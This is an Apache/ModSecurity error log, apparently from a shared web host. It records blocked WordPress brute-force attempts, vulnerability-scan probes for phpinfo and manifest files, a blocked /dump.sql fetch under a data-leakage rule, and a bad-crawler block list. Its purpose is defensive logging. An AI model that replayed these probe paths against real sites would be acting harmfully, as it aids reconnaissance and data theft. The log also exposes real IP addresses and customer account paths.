[Tue May 26 14:42:31.471114 2026] [security2:error] [pid 636820:tid 637029] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVj_6_r6oOphPch7B-B2QAAAE8"]
[Tue May 26 14:42:32.338542 2026] [security2:error] [pid 636820:tid 636872] [remote 74.7.241.58:50418] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVkAK_r6oOphPch7B-B-gAAQTM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 14:42:32.371377 2026] [security2:error] [pid 636820:tid 637009] [client 45.84.107.174:6109] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "veganfoodindia.com"] [uri "/wp-content/plugins/mojo-marketplace-wp-plugin/readme.txt"] [unique_id "ahVkAK_r6oOphPch7B-B-wAAADs"]
[Tue May 26 14:42:33.387152 2026] [security2:error] [pid 636820:tid 637006] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkAK_r6oOphPch7B-CCgAAADg"]
[Tue May 26 14:42:35.021479 2026] [security2:error] [pid 636820:tid 636984] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkAq_r6oOphPch7B-CRQAAACI"]
[Tue May 26 14:42:36.937057 2026] [security2:error] [pid 636820:tid 636966] [client 43.172.194.130:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVkBK_r6oOphPch7B-CegAAABA"]
[Tue May 26 14:42:37.540947 2026] [security2:error] [pid 636820:tid 636999] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkBa_r6oOphPch7B-CjAAAADE"]
[Tue May 26 14:42:39.730718 2026] [security2:error] [pid 636820:tid 637045] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkB6_r6oOphPch7B-C1wAAAF8"]
[Tue May 26 14:42:41.624989 2026] [security2:error] [pid 636820:tid 637072] [client 202.141.83.254:19804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkCa_r6oOphPch7B-DDQAAAHo"]
[Tue May 26 14:42:41.625151 2026] [security2:error] [pid 636820:tid 637072] [client 202.141.83.254:19804] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkCa_r6oOphPch7B-DDQAAAHo"]
[Tue May 26 14:42:41.768086 2026] [security2:error] [pid 636820:tid 636961] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkCa_r6oOphPch7B-DBgAAAAs"]
[Tue May 26 14:42:43.228197 2026] [autoindex:error] [pid 636820:tid 637057] [client 62.60.130.227:49424] AH01276: Cannot serve directory /home2/svijakqj/dglmmm.org.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:42:43.687480 2026] [security2:error] [pid 636820:tid 637032] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkC6_r6oOphPch7B-DPwAAAFI"]
[Tue May 26 14:42:43.755337 2026] [security2:error] [pid 636820:tid 637052] [client 62.60.130.227:49424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/xmlrpc.php"] [unique_id "ahVkC6_r6oOphPch7B-DSwAAAGY"]
[Tue May 26 14:42:44.090979 2026] [security2:error] [pid 636820:tid 637031] [client 62.60.130.227:57304] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVkDK_r6oOphPch7B-DVgAAAFE"]
[Tue May 26 14:42:44.423368 2026] [security2:error] [pid 636820:tid 637041] [client 62.60.130.227:64130] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVkDK_r6oOphPch7B-DXQAAAFs"]
[Tue May 26 14:42:44.763930 2026] [security2:error] [pid 636820:tid 637033] [client 62.60.130.227:49294] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVkDK_r6oOphPch7B-DZwAAAFM"]
[Tue May 26 14:42:45.100501 2026] [security2:error] [pid 636820:tid 637020] [client 62.60.130.227:50956] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVkDa_r6oOphPch7B-DbgAAAEY"]
[Tue May 26 14:42:45.440569 2026] [security2:error] [pid 636820:tid 636989] [client 62.60.130.227:58847] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVkDa_r6oOphPch7B-DcgAAACc"]
[Tue May 26 14:42:45.777974 2026] [security2:error] [pid 636820:tid 637048] [client 62.60.130.227:63108] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVkDa_r6oOphPch7B-DfgAAAGI"]
[Tue May 26 14:42:46.244322 2026] [security2:error] [pid 636820:tid 637066] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkDa_r6oOphPch7B-DhQAAAHQ"]
[Tue May 26 14:42:47.863635 2026] [security2:error] [pid 636820:tid 637048] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkD6_r6oOphPch7B-DugAAAGI"]
[Tue May 26 14:42:49.986808 2026] [security2:error] [pid 636820:tid 636984] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkEa_r6oOphPch7B-D-gAAACI"]
[Tue May 26 14:42:50.442482 2026] [security2:error] [pid 636820:tid 636933] [remote 13.203.52.35:47112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.52.203.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVkEq_r6oOphPch7B-EDQAAUHA"]
[Tue May 26 14:42:51.900041 2026] [security2:error] [pid 636820:tid 637072] [client 202.141.83.254:19938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkE6_r6oOphPch7B-EQwAAAHo"]
[Tue May 26 14:42:51.900450 2026] [security2:error] [pid 636820:tid 637072] [client 202.141.83.254:19938] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkE6_r6oOphPch7B-EQwAAAHo"]
[Tue May 26 14:42:52.230850 2026] [security2:error] [pid 636820:tid 637009] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkE6_r6oOphPch7B-EQAAAADs"]
[Tue May 26 14:42:52.663075 2026] [security2:error] [pid 636820:tid 637038] [client 114.119.139.102:52167] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "crusties.agsnails.com"] [uri "/ucxcuo/barbados-cricket-association-2020"] [unique_id "ahVkFK_r6oOphPch7B-EWgAAAFg"], referer: https://crusties.agsnails.com/ucxcuo/barbados-cricket-association-2020
[Tue May 26 14:42:53.950543 2026] [security2:error] [pid 636820:tid 636973] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkFa_r6oOphPch7B-EfgAAABc"]
[Tue May 26 14:42:54.167053 2026] [core:crit] [pid 636820:tid 636988] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:42:55.581305 2026] [security2:error] [pid 636820:tid 636958] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkF6_r6oOphPch7B-EswAAAAg"]
[Tue May 26 14:42:58.102973 2026] [security2:error] [pid 636820:tid 637001] [client 74.109.56.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkGa_r6oOphPch7B-FBQAAADM"]
[Tue May 26 14:42:58.316945 2026] [security2:error] [pid 636820:tid 637021] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkGa_r6oOphPch7B-FFwAAAEc"]
[Tue May 26 14:43:00.343246 2026] [security2:error] [pid 636820:tid 637040] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkG6_r6oOphPch7B-FcwAAAFo"]
[Tue May 26 14:43:00.963970 2026] [security2:error] [pid 636820:tid 636970] [client 64.190.76.4:56810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "acdealernoida.in"] [uri "/dump.sql"] [unique_id "ahVkHK_r6oOphPch7B-FkQAAABQ"], referer: acdealernoida.in/dump.sql
[Tue May 26 14:43:02.309211 2026] [security2:error] [pid 636820:tid 636999] [client 202.141.83.254:19935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkHq_r6oOphPch7B-FsgAAADE"]
[Tue May 26 14:43:02.309321 2026] [security2:error] [pid 636820:tid 636999] [client 202.141.83.254:19935] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkHq_r6oOphPch7B-FsgAAADE"]
[Tue May 26 14:43:02.559577 2026] [security2:error] [pid 636820:tid 637032] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkHq_r6oOphPch7B-FsQAAAFI"]
[Tue May 26 14:43:03.078667 2026] [security2:error] [pid 636820:tid 636978] [client 154.161.32.97:46556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVkHq_r6oOphPch7B-FyAAAABw"]
[Tue May 26 14:43:03.078789 2026] [security2:error] [pid 636820:tid 636978] [client 154.161.32.97:46556] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVkHq_r6oOphPch7B-FyAAAABw"]
[Tue May 26 14:43:04.064253 2026] [security2:error] [pid 636820:tid 637049] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkH6_r6oOphPch7B-F6AAAAGM"]
[Tue May 26 14:43:04.549171 2026] [security2:error] [pid 636820:tid 637000] [client 89.124.83.75:49722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 75.83.124.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVkIK_r6oOphPch7B-F_wAAADI"], referer: http://poonawallatennisacademy.com/hello-world/
[Tue May 26 14:43:04.549318 2026] [security2:error] [pid 636820:tid 637000] [client 89.124.83.75:49722] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVkIK_r6oOphPch7B-F_wAAADI"], referer: http://poonawallatennisacademy.com/hello-world/
[Tue May 26 14:43:06.576526 2026] [security2:error] [pid 636820:tid 636970] [client 31.57.184.107:51351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVkIq_r6oOphPch7B-GQwAAABQ"]
[Tue May 26 14:43:06.815649 2026] [security2:error] [pid 636820:tid 636987] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkIq_r6oOphPch7B-GQgAAACU"]
[Tue May 26 14:43:07.615701 2026] [security2:error] [pid 636820:tid 636939] [remote 209.42.20.53:38722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVkI6_r6oOphPch7B-GYwAANnY"]
[Tue May 26 14:43:08.255646 2026] [security2:error] [pid 636820:tid 637030] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkI6_r6oOphPch7B-GbgAAAFA"]
[Tue May 26 14:43:10.743818 2026] [security2:error] [pid 636820:tid 637055] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkJq_r6oOphPch7B-G7gAAAGk"]
[Tue May 26 14:43:10.916023 2026] [security2:error] [pid 636820:tid 637047] [client 195.178.110.34:35438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/_phpinfo.php"] [unique_id "ahVkJq_r6oOphPch7B-G-QAAAGE"]
[Tue May 26 14:43:12.561256 2026] [security2:error] [pid 636820:tid 637010] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkKK_r6oOphPch7B-HFAAAADw"]
[Tue May 26 14:43:13.216112 2026] [security2:error] [pid 636820:tid 637031] [client 202.141.83.254:19863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkKa_r6oOphPch7B-HJwAAAFE"]
[Tue May 26 14:43:13.216232 2026] [security2:error] [pid 636820:tid 637031] [client 202.141.83.254:19863] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkKa_r6oOphPch7B-HJwAAAFE"]
[Tue May 26 14:43:14.259065 2026] [security2:error] [pid 636820:tid 636972] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkKa_r6oOphPch7B-HQgAAABY"]
[Tue May 26 14:43:14.352846 2026] [security2:error] [pid 636820:tid 636952] [client 185.191.171.8:14410] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-27th/list/"] [unique_id "ahVkKq_r6oOphPch7B-HSwAAAAI"]
[Tue May 26 14:43:14.352983 2026] [security2:error] [pid 636820:tid 636952] [client 185.191.171.8:14410] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-27th/list/"] [unique_id "ahVkKq_r6oOphPch7B-HSwAAAAI"]
[Tue May 26 14:43:16.211737 2026] [security2:error] [pid 636820:tid 637070] [client 206.198.216.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkLK_r6oOphPch7B-HigAAAHg"], referer: https://www.anujtradingco.com/
[Tue May 26 14:43:16.444510 2026] [security2:error] [pid 636820:tid 637057] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkLK_r6oOphPch7B-HhAAAAGs"]
[Tue May 26 14:43:17.408422 2026] [security2:error] [pid 636820:tid 637067] [client 206.198.216.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkLa_r6oOphPch7B-HsgAAAHU"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1256228&moderation-hash=b0fedaf305cdfebcb90f0d0834507cf4
[Tue May 26 14:43:17.733712 2026] [security2:error] [pid 636820:tid 637066] [client 195.178.110.34:36932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/_phpinfo.php"] [unique_id "ahVkLa_r6oOphPch7B-HuAAAAHQ"]
[Tue May 26 14:43:19.315225 2026] [security2:error] [pid 636820:tid 636987] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkLq_r6oOphPch7B-H1wAAACU"]
[Tue May 26 14:43:19.638978 2026] [security2:error] [pid 636820:tid 637019] [client 94.103.90.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVkL6_r6oOphPch7B-H6QAAAEU"], referer: http://bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 14:43:20.466796 2026] [security2:error] [pid 636820:tid 637071] [client 206.198.216.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkMK_r6oOphPch7B-IAQAAAHk"], referer: https://anujtradingco.com
[Tue May 26 14:43:21.063617 2026] [security2:error] [pid 636820:tid 636969] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkMK_r6oOphPch7B-IBwAAABM"]
[Tue May 26 14:43:21.918859 2026] [security2:error] [pid 636820:tid 637039] [client 94.103.90.150:50731] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "94.103.90.150" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVkMa_r6oOphPch7B-IKQAAAFk"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
